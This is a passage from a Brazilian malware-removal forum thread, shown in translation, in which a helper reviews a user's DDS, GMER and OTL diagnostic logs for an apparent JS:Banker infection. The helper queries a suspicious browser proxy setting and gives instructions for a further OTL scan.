BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office\office14\URLREDIR.DLL

BHO: SpeedBit Link Verification Helper: {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - c:\program files\dap\LinkVerifier.dll

BHO: Java Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre7\bin\jp2ssv.dll

TB: Google Toolbar: {2318C2B1-4965-11D4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll

uRun: [F.lux] "c:\users\2011\local settings\apps\f.lux\flux.exe" /noshow

uRun: [swg] "c:\program files\google\googletoolbarnotifier\GoogleToolbarNotifier.exe"

uRun: [Google Update] "c:\users\2011\appdata\local\google\update\GoogleUpdate.exe" /c

mRun: [AvastUI.exe] "c:\program files\avast software\avast\AvastUI.exe" /nogui

mRun: [sunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"

mPolicies-System: ConsentPromptBehaviorAdmin = dword:5

mPolicies-System: ConsentPromptBehaviorUser = dword:3

mPolicies-System: EnableUIADesktopToggle = dword:0

IE: &Download with &DAP - c:\program files\dap\dapextie.htm

IE: &Verify with DAP - c:\program files\dap\dapverify.htm

IE: Download &all with DAP - c:\program files\dap\dapextie2.htm

IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office10\EXCEL.EXE/3000

IE: E&xportar para o Microsoft Excel - c:\progra~1\micros~2\office11\EXCEL.EXE/3000

IE: Sothink Flash Downloader For IE - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm

DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab

DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

TCP: NameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

TCP: Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439} : DHCPNameServer = 8.8.8.8 186.194.224.2 189.51.144.3 8.8.4.4

Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - c:\program files\common files\microsoft shared\office14\MSOXMLMF.DLL

Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll

Name-Space Handler: FTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

Name-Space Handler: HTTP\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - c:\program files\dap\dapie.dll

SSODL: WebCheck - <orphaned>

SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office14\GROOVEEX.DLL

.

================= FIREFOX ===================

.

FF - ProfilePath - c:\users\2011\appdata\roaming\mozilla\firefox\profiles\1t2pwtzw.default\

FF - prefs.js: browser.search.selectedEngine - Google

FF - prefs.js: network.proxy.http - 189.112.117.5

FF - prefs.js: network.proxy.type - 2

FF - plugin: c:\progra~1\micros~2\office14\NPAUTHZ.DLL

FF - plugin: c:\progra~1\micros~2\office14\NPSPWRAP.DLL

FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll

FF - plugin: c:\program files\foxit software\foxit reader\plugins\npFoxitReaderPlugin.dll

FF - plugin: c:\program files\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\program files\java\jre7\bin\plugin2\npjp2.dll

FF - plugin: c:\users\2011\appdata\local\google\update\1.3.21.165\npGoogleUpdate3.dll

FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_8_800_168.dll

FF - plugin: c:\windows\system32\npDeployJava1.dll

FF - plugin: c:\windows\system32\npmproxy.dll

.

============= SERVICES / DRIVERS ===============

.

R0 aswRvrt;avast! Revert;c:\windows\system32\drivers\aswRvrt.sys [2013-3-3 49944]

R0 aswVmm;avast! VM Monitor;c:\windows\system32\drivers\aswVmm.sys [2013-3-3 178304]

R1 aswSnx;aswSnx;c:\windows\system32\drivers\aswSnx.sys [2012-8-6 774392]

R1 aswSP;aswSP;c:\windows\system32\drivers\aswsp.sys [2013-11-8 403440]

R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [2012-9-15 242240]

R2 aswFsBlk;aswFsBlk;c:\windows\system32\drivers\aswFsBlk.sys [2012-8-6 35656]

R2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2012-8-6 70384]

R2 avast! Antivirus;avast! Antivirus;c:\program files\avast software\avast\AvastSvc.exe [2013-11-8 50344]

R2 svcgdp;software services;c:\program files\software plate\svcgdp.exe [2012-9-24 92800]

S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]

S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-6-21 162408]

S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]

S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2013-4-25 14848]

S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2013-4-25 49664]

S4 KMService;KMService;c:\windows\system32\srvany.exe [2012-8-7 8192]

.

=============== Created Last 30 ================

.

2013-11-17 15:08:42 -------- d-----w- C:\AdwCleaner

2013-11-13 01:25:21 1796096 ----a-w- c:\windows\system32\authui.dll

2013-10-24 11:51:52 94632 ----a-w- c:\windows\system32\WindowsAccessBridge.dll

.

==================== Find3M ====================

.

2013-11-09 00:36:36 774392 ----a-w- c:\windows\system32\drivers\aswSnx.sys

2013-11-09 00:36:36 70384 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys

2013-11-09 00:36:35 43152 ----a-w- c:\windows\avastSS.scr

2013-10-21 16:12:37 79720 ----a-w- c:\windows\system32\drivers\aswRdr2.sys

2013-10-21 16:12:37 49944 ----a-w- c:\windows\system32\drivers\aswRvrt.sys

2013-10-21 16:12:37 178304 ----a-w- c:\windows\system32\drivers\aswVmm.sys

2013-10-12 07:03:50 1767936 ----a-w- c:\windows\system32\wininet.dll

2013-10-12 07:02:33 2877952 ----a-w- c:\windows\system32\jscript9.dll

2013-10-12 07:02:29 61440 ----a-w- c:\windows\system32\iesetup.dll

2013-10-12 07:02:29 109056 ----a-w- c:\windows\system32\iesysprep.dll

2013-10-12 06:08:58 2706432 ----a-w- c:\windows\system32\mshtml.tlb

2013-10-12 05:15:39 71680 ----a-w- c:\windows\system32\RegisterIEPKEYs.exe

2013-10-12 02:03:08 656896 ----a-w- c:\windows\system32\nshwfp.dll

2013-10-12 02:01:41 679424 ----a-w- c:\windows\system32\IKEEXT.DLL

2013-10-12 02:01:25 216576 ----a-w- c:\windows\system32\FWPUCLNT.DLL

2013-10-09 02:56:36 71048 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl

2013-10-09 02:56:36 692616 ----a-w- c:\windows\system32\FlashPlayerApp.exe

2013-10-05 19:57:25 1168384 ----a-w- c:\windows\system32\crypt32.dll

2013-10-04 01:58:50 152576 ----a-w- c:\windows\system32\SmartcardCredentialProvider.dll

2013-10-04 01:56:25 168960 ----a-w- c:\windows\system32\credui.dll

2013-10-03 01:58:07 305152 ----a-w- c:\windows\system32\gdi32.dll

2013-09-25 02:01:08 136640 ----a-w- c:\windows\system32\drivers\ksecpkg.sys

2013-09-25 02:01:06 67520 ----a-w- c:\windows\system32\drivers\ksecdd.sys

2013-09-25 01:57:46 99840 ----a-w- c:\windows\system32\sspicli.dll

2013-09-25 01:57:26 22016 ----a-w- c:\windows\system32\secur32.dll

2013-09-25 01:57:24 247808 ----a-w- c:\windows\system32\schannel.dll

2013-09-25 01:56:42 220160 ----a-w- c:\windows\system32\ncrypt.dll

2013-09-25 01:56:02 1038848 ----a-w- c:\windows\system32\lsasrv.dll

2013-09-25 00:49:20 22016 ----a-w- c:\windows\system32\lsass.exe

2013-09-25 00:49:18 15872 ----a-w- c:\windows\system32\sspisrv.dll

2013-09-14 00:48:58 338944 ----a-w- c:\windows\system32\drivers\afd.sys

2013-09-08 02:07:12 1294272 ----a-w- c:\windows\system32\drivers\tcpip.sys

2013-09-08 02:03:58 231424 ----a-w- c:\windows\system32\mswsock.dll

2013-09-04 01:15:32 258560 ----a-w- c:\windows\system32\drivers\usbhub.sys

2013-09-04 01:14:52 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys

2013-09-04 01:14:52 284672 ----a-w- c:\windows\system32\drivers\usbport.sys

2013-09-04 01:14:45 43008 ----a-w- c:\windows\system32\drivers\usbehci.sys

2013-09-04 01:14:45 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys

2013-09-04 01:14:43 24064 ----a-w- c:\windows\system32\drivers\usbuhci.sys

2013-09-04 01:14:40 6016 ----a-w- c:\windows\system32\drivers\usbd.sys

2013-08-29 01:51:45 3969472 ----a-w- c:\windows\system32\ntkrnlpa.exe

2013-08-29 01:51:45 3914176 ----a-w- c:\windows\system32\ntoskrnl.exe

2013-08-29 01:50:30 1289096 ----a-w- c:\windows\system32\ntdll.dll

2013-08-29 01:50:16 619520 ----a-w- c:\windows\system32\tdh.dll

2013-08-29 01:48:17 640512 ----a-w- c:\windows\system32\advapi32.dll

2013-08-28 01:04:30 2348544 ----a-w- c:\windows\system32\win32k.sys

2013-08-28 00:57:20 434688 ----a-w- c:\windows\system32\scavengeui.dll

2013-08-24 11:59:27 773800 ----a-w- c:\windows\system32\msvcr100.dll

2013-08-24 11:59:26 421032 ----a-w- c:\windows\system32\msvcp100.dll

.

============= FINISH: 23:14:56,93 ===============

.

UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.

IF REQUESTED, ZIP IT UP & ATTACH IT

.

DDS (Ver_2012-11-20.01)

.

Microsoft Windows 7 Ultimate

Boot Device: \Device\HarddiskVolume1

Install Date: 29/09/2011 10:03:29

System Uptime: 20/11/2013 22:49:59 (1 hours ago)

.

Motherboard: Dell Inc. | | 0WG864

Processor: Intel® Core2 CPU 6320 @ 1.86GHz | Microprocessor | 1862/1066mhz

.

==== Disk Partitions =========================

.

A: is Removable

C: is FIXED (NTFS) - 233 GiB total, 102,791 GiB free.

D: is CDROM ()

E: is CDROM ()

.

==== Disabled Device Manager Items =============

.

==== System Restore Points ===================

.

RP101: 13/11/2013 00:31:54 - Windows Update

RP102: 18/11/2013 22:51:41 - Removed Adobe Reader X (10.1.8).

.

==== Installed Programs ======================

.

Adobe Flash Player 11 ActiveX

Adobe Flash Player 11 Plugin

µTorrent

avast! Free Antivirus

BS.Player FREE

BS.Player PRO

CCleaner

CDBurnerXP

DAEMON Tools Lite

Daum PotPlayer 1.5.37776

Download Accelerator Plus (DAP)

F.lux

FormatFactory 3.1.1

Foxit Reader

Google Chrome

Google Toolbar for Internet Explorer

Google Update Helper

Java 7 Update 45

Java Auto Updater

Java 6 Update 30

JavaFX 2.1.1

K-Lite Codec Pack 9.1.0 (Full)

Microsoft .NET Framework 4 Client Profile

Microsoft Office 2010 Service Pack 1 (SP1)

Microsoft Office Access MUI (English) 2010

Microsoft Office Access Setup Metadata MUI (English) 2010

Microsoft Office Excel MUI (English) 2010

Microsoft Office Groove MUI (English) 2010

Microsoft Office InfoPath MUI (English) 2010

Microsoft Office OneNote MUI (English) 2010

Microsoft Office Outlook MUI (English) 2010

Microsoft Office PowerPoint MUI (English) 2010

Microsoft Office Professional Plus 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (Spanish) 2010

Microsoft Office Proofing (English) 2010

Microsoft Office Publisher MUI (English) 2010

Microsoft Office Shared MUI (English) 2010

Microsoft Office Shared Setup Metadata MUI (English) 2010

Microsoft Office Word MUI (English) 2010

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Mozilla Firefox 20.0.1 (x86 pt-BR)

Mozilla Maintenance Service

PDFCreator

Quake III Arena

Samsung ML-1860 Series

Samsung Printer Live Update

Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2835393)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2858302v2)

Skype™ 6.6

Sothink SWF Decompiler

StreamTransport version: 1.0.2.2171

Update for Microsoft .NET Framework 4 Client Profile (KB2468871)

Update for Microsoft .NET Framework 4 Client Profile (KB2533523)

Update for Microsoft .NET Framework 4 Client Profile (KB2600217)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939)

Update for Microsoft .NET Framework 4 Client Profile (KB2836939v3)

VLC media player 2.0.4

Winamp

Windows Media Player Firefox Plugin

WinRAR 4.10 (32-bit)

.

==== End Of File ===========================

GMER 2.1.19163 - http://www.gmer.net

Rootkit scan 2013-11-20 23:40:36

Windows 6.1.7601 Service Pack 1 \Device\Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 WDC_WD25 rev.10.0 232,83GB

Running: gmer.exe; Driver: C:\Users\2011\AppData\Local\Temp\pxldipog.sys

---- System - GMER 2.1 ----

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAddBootEntry [0x9061EB10]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwAssignProcessToJobObject [0x9061F5EE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEvent [0x9062B5E0]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateEventPair [0x9062B62C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateIoCompletion [0x9062B7C6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateMutant [0x9062B54E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSection [0x9062B670]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateSemaphore [0x9062B596]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThread [0x9061FB24]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateThreadEx [0x9061FD40]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwCreateTimer [0x9062B780]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDebugActiveProcess [0x906203DC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDeleteBootEntry [0x9061EB76]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwDuplicateObject [0x90623B58]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwLoadDriver [0x9061E75E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwModifyBootEntry [0x9061EBDC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeKey [0x90623F4E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwNotifyChangeMultipleKeys [0x90620E6C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEvent [0x9062B60A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenEventPair [0x9062B64E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenIoCompletion [0x9062B7EA]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenMutant [0x9062B574]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenProcess [0x90623452]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSection [0x9062B6FE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenSemaphore [0x9062B5BE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenThread [0x9062383A]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwOpenTimer [0x9062B7A4]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwProtectVirtualMemory [0x889A50CC]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueryObject [0x90620D38]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwQueueApcThreadEx [0x90620A46]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootEntryOrder [0x9061EC42]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetBootOptions [0x9061ECA8]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwSetContextThread [0x889A5316]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemInformation [0x9061E7F8]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSetSystemPowerState [0x9061E9CE]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwShutdownSystem [0x9061E95C]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendProcess [0x906205A6]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSuspendThread [0x90620708]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwSystemDebugControl [0x9061EA56]

SSDT \??\C:\Windows\system32\drivers\aswSP.sys ZwTerminateProcess [0x889A5194]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwTerminateThread [0x90620236]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwVdmControl [0x9061ED0E]

SSDT \??\C:\Windows\system32\drivers\aswSnx.sys ZwWriteVirtualMemory [0x9061F64A]

---- Kernel code sections - GMER 2.1 ----

.text ntkrnlpa.exe!ZwRollbackEnlistment + 142D 82A53A15 1 Byte [06]

.text ntkrnlpa.exe!KiDispatchInterrupt + 5A2 82A8D212 19 Bytes [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}

.text ntkrnlpa.exe!KeRemoveQueueEx + 10CB 82A94460 4 Bytes [10, EB, 61, 90] {ADC BL, CH; POPA ; NOP }

.text ntkrnlpa.exe!KeRemoveQueueEx + 1153 82A944E8 4 Bytes [EE, F5, 61, 90] {OUT DX, AL; CMC ; POPA ; NOP }

.text ntkrnlpa.exe!KeRemoveQueueEx + 11A7 82A9453C 8 Bytes [E0, B5, 62, 90, 2C, B6, 62, ...] {LOOPNZ 0xffffffb7; BOUND EDX, [EAX-0x6f9d49d4]}

.text ntkrnlpa.exe!KeRemoveQueueEx + 11B3 82A94548 4 Bytes [C6, B7, 62, 90]

.text ntkrnlpa.exe!KeRemoveQueueEx + 11CF 82A94564 4 Bytes [4E, B5, 62, 90] {DEC ESI; MOV CH, 0x62; NOP }

.text ...

.text C:\Windows\system32\drivers\atikmdag.sys section is writeable [0x9120B000, 0x227A14, 0xE8000020]

? C:\Users\2011\AppData\Local\Temp\mbr.sys O sistema não pode encontrar o arquivo especificado. !

---- User code sections - GMER 2.1 ----

.text C:\Windows\system32\taskhost.exe[388] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\csrss.exe[424] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\wininit.exe[496] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\csrss.exe[508] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text C:\Windows\system32\services.exe[544] kernel32.dll!GetBinaryTypeW + 70 764969E4 1 Byte [62]

.text ...

---- Devices - GMER 2.1 ----

AttachedDevice \Driver\tdx \Device\Tcp aswTdi.sys

AttachedDevice \Driver\tdx \Device\Udp aswTdi.sys

---- EOF - GMER 2.1 ----


Dear manoelvalerio

I recommend that you save this topic in your Favorites to make it easier to find later.

Please pay attention to the following:

  • If you go without a reply for 3 days, send me a Private Message (PM);
  • What is covered here concerns only the problem with your computer, so do not do any of it on any other;
  • Please follow the instructions given carefully and, if in doubt, do not hesitate to ask;
  • Always post your replies in this topic... Do not open another!
  • Always try to keep me informed, during the removal, about what happens with your computer.
  • Respect the order of the instructions given.
  • Note: Do not take any measures beyond those given here; if you ask for help on another forum, be sure to let us know, at the risk of misconfiguring your computer!

# Step 1 #

The analyst diego_moicano solved the same infection on 15/11/13
Do you still have the link to that topic?

Do you know this IP: 189.112.117.5

Could you post the Avast log about the infection?

Regards :D


Hi Diego! The topic link is this one: http://forum.clubedohardware.com.br/como-remover-js/1160861

--------------

Do you know this IP: 189.112.117.5

I don't know it.. my IPv4 is: 179.107.3.105

--------------

I don't know where to get the Avast log from, lol. I only managed to take two screenshots of the malware when Avast pops up on the screen.

[screenshot: js_banker2.jpg]

[screenshot: js_banker1.jpg]

Awaiting further instructions. Thank you.


Dear manoelvalerio

According to our rules you could only open a new topic after 30 days; that is the period we give before helping the same user again. Now, you could ask to have your old topic reopened, since the suspicion is that the same malware has come back. Let's do the following: I see you are new to the forum, so let's just continue here, and if you have a new problem involving the same infection (important detail), ask to have the topic reopened ;)

Download OTL by OldTimer and save it to your Desktop.

  • Double-click the icon [image: 3984478580_7ed4cabc45_o.gif]
  • Leave the main screen configured as in the figure below:

[image: 5369448421_6bf795eb1a_b.jpg]

  • Copy and paste the content below into the box right after [image: 5369460409_ee749edc8e_m.jpg]
netsvcs
msconfig
safebootminimal
safebootnetwork
activex
drivers32
/md5start
eventlog.dll
scecli.dll
netlogon.dll
cngaudit.dll
sceclt.dll
ntelogon.dll
logevent.dl
iaStor.sys
nvstor.sys
atapi.sys
IdeChnDr.sys
viasraid.sys
/md5stop

  • Click the button [image: 5370056362_e3d07d5d8a_m.jpg]
  • Do not interrupt the scan under any circumstances;
  • When it finishes, two logs will be generated: OTL.txt and Extras.txt;
  • Restart the computer;
  • Post both logs in your next reply.
  • Do not delete OTL

Regards :D


According to our rules you could only open a new topic after 30 days; that is the period we give before helping the same user again.

----------

Good morning Diego! I did not open a new topic; I have never been helped by the analysts here at CDH. I just figured the same solution adopted for another user here on the forum would work for my case =]

As soon as I get home I will post the requested logs.

Thanks for your attention.

Regards!

Good morning Diego! I did not open a new topic; I have never been helped by the analysts here at CDH. I just figured the same solution adopted for another user here on the forum would work for my case =]
You're right, I apologize for the confusion ;)

Awaiting the logs :)


Good morning Diego!

Here are the logs.

Thanks for your attention!

OTL logfile created on: 30/11/2013 11:25:47 - Run 1

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.10.9200.16736)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

2,00 Gb Total Physical Memory | 1,51 Gb Available Physical Memory | 75,56% Memory free

4,00 Gb Paging File | 3,35 Gb Available in Paging File | 83,81% Paging File free

Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files

Drive C: | 232,73 Gb Total Space | 106,05 Gb Free Space | 45,57% Space Free | Partition Type: NTFS

Computer Name: 2011_PC | User Name: 2011 | Logged in as Administrator.

Boot Mode: Normal | Scan Mode: All users

Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

PRC - [2013/11/08 22:36:33 | 003,568,312 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastUI.exe

PRC - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe

PRC - [2013/03/15 04:03:42 | 000,222,208 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Internet Explorer\ielowutil.exe

PRC - [2012/11/23 00:48:41 | 000,049,152 | ---- | M] (Microsoft Corporation) -- C:\Windows\System32\taskhost.exe

PRC - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) -- C:\Arquivos de Programas\Software Plate\svcgdp.exe

PRC - [2011/02/25 03:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe

PRC - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe

PRC - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Modules (No Company Name) ==========

MOD - [2013/10/21 14:12:35 | 019,336,120 | ---- | M] () -- C:\Arquivos de Programas\AVAST Software\Avast\libcef.dll

MOD - [2011/03/17 00:11:16 | 004,297,568 | ---- | M] () -- C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF

MOD - [2010/10/20 15:45:26 | 008,801,120 | ---- | M] () -- C:\Arquivos de Programas\Microsoft Office\Office14\1033\GrooveIntlResource.dll

MOD - [2009/08/29 04:00:12 | 000,966,656 | ---- | M] () -- C:\Users\2011\Local Settings\Apps\F.lux\flux.exe

========== Services (SafeList) ==========

SRV - [2013/11/08 22:36:32 | 000,050,344 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Arquivos de Programas\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)

SRV - [2013/10/09 00:56:37 | 000,257,416 | ---- | M] (Adobe Systems Incorporated) [On_Demand | Stopped] -- C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)

SRV - [2013/10/05 22:41:26 | 000,115,608 | ---- | M] (Mozilla Foundation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)

SRV - [2013/06/21 11:57:12 | 000,162,408 | R--- | M] (Skype Technologies) [Auto | Stopped] -- C:\Arquivos de Programas\Skype\Updater\Updater.exe -- (SkypeUpdate)

SRV - [2013/05/27 02:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Windows Defender\MpSvc.dll -- (WinDefend)

SRV - [2012/09/24 12:26:30 | 000,092,800 | ---- | M] (Beijing Xing Technology Co., Ltd.) [Auto | Running] -- C:\Arquivos de Programas\Software Plate\svcgdp.exe -- (svcgdp)

SRV - [2010/12/27 23:50:30 | 031,124,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Office\Office14\GROOVE.EXE -- (Microsoft SharePoint Workspace Audit Service)

SRV - [2010/11/20 10:17:56 | 001,121,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Arquivos de Programas\Windows Media Player\wmpnetwk.exe -- (WMPNetworkSvc)

SRV - [2010/01/09 21:37:50 | 004,640,000 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE -- (osppsvc)

SRV - [2010/01/09 21:18:00 | 000,149,352 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Arquivos de Programas\Common Files\microsoft shared\Source Engine\OSE.EXE -- (ose)

SRV - [2009/07/13 23:16:13 | 000,025,088 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\sensrsvc.dll -- (SensrSvc)

SRV - [2009/07/13 23:16:12 | 001,004,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\PeerDistSvc.dll -- (PeerDistSvc)

SRV - [2003/04/18 20:06:26 | 000,008,192 | ---- | M] () [Disabled | Stopped] -- C:\Windows\System32\srvany.exe -- (KMService)

========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\rdvgkmd.sys -- (VGPU)

DRV - File not found [Kernel | On_Demand | Stopped] -- system32\drivers\tsusbhub.sys -- (tsusbhub)

DRV - File not found [Kernel | On_Demand | Stopped] -- System32\drivers\synth3dvsc.sys -- (Synth3dVsc)

DRV - [2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswsp.sys -- (aswSP)

